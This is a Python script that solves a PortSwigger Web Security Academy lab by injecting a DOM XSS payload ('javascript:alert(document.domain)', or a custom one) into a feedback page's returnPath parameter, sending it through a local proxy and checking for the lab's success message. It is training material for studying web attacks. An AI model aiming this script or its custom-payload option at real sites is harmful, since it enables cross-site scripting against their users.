exploit.py

#!/usr/bin/env python3

import argparse
import requests
import urllib3
from bs4 import BeautifulSoup
from colorama import Fore, Style

# ignores InsecureRequestWarning - comment out if want warning
# See: https://urllib3.readthedocs.io/en/1.26.x/advanced-usage.html#ssl-warnings
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

proxies = {
    'http': 'http://127.0.0.1:8080',
    'https': 'http://127.0.0.1:8080'
}

parser = argparse.ArgumentParser(description='This is a script to exploit DOM XSS in jQuery anchor href attribute sink using location.search source in the PortSwigger Web Security Lab.')
# -u | --url URL
parser.add_argument(
    '-u',
    '--url',
    metavar='url',
    type=str,
    default='',
    nargs='?',
    help='your lab url, make sure to include the / at the end - example: ./exploit.py -u https://YOUR-LAB-ID.web-security-academy.net/'
)
# -p | --payload Your custom payload (optional)
parser.add_argument(
    '-p',
    '--payload',
    metavar='payload',
    type=str,
    nargs='?',
    default='javascript:alert(document.domain)',
    help='your custom payload (optional) default: javascript:alert(document.domain)'
)
args = parser.parse_args()
if args.url == '' or args.url is None:
    print(parser.print_help())
    exit(1)


payload = args.payload
EXPLOIT_URL = args.url + 'feedback?returnPath=' + payload
try:
    resp = requests.get(EXPLOIT_URL, verify=False, proxies=proxies)
# proxy check
except requests.exceptions.ProxyError as err:
    print(
        f'{Fore.RED}[*]{Style.BRIGHT} Check your proxy.. is it open?{Style.RESET_ALL}')
    print(
        f'{Fore.RED}[*]{Style.BRIGHT} Error Message:{Style.RESET_ALL} {err}')
    exit(1)

if resp.status_code != 200:
    print(f'{Fore.RED}[!] HTTP status code of {resp.status_code} returned, but 200 was expected. Exiting... {Style.RESET_ALL}')
    exit(1)

SOLVED_URL = args.url
resp_success = requests.get(SOLVED_URL, verify=False, proxies=proxies)
soup = BeautifulSoup(resp_success.content, 'html.parser')
success_message = soup.find(string="Congratulations, you solved the lab!")
if success_message:
    print(f'[{Fore.GREEN}*{Style.RESET_ALL}] You Sent: {resp.url}')
    print('---')
    print(f'[{Fore.GREEN}*{Style.RESET_ALL}] You Received: {success_message}')
    print('---')
else:
    print('---')
    print(f'[*] You sent: {resp.url}')
    print('---')
    print(f'[{Fore.RED}!{Style.RESET_ALL}] Try again')
    print('---')

print('[*] Want to see more? Check your proxy & browser 🫥')